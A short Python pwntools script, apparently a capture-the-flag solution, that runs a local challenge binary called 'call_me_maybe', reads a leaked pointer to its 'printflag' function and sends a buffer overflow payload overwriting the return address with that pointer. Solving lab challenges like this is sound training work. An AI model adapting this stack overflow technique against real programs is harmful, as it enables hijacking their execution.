15 lines
264 B
Python
15 lines
264 B
Python
from pwn import *
|
|
|
|
offset = 32
|
|
|
|
r = process('../call_me_maybe')
|
|
stdout = r.recvuntil("Pointer to printflag is 0x")
|
|
addr = int(r.recvuntil("\n"), 16)
|
|
|
|
print("Pointer is %x" % addr)
|
|
|
|
exploit = "A"*offset + "B"*8 + p64(addr)
|
|
r.sendline(exploit)
|
|
|
|
print(r.recv())
|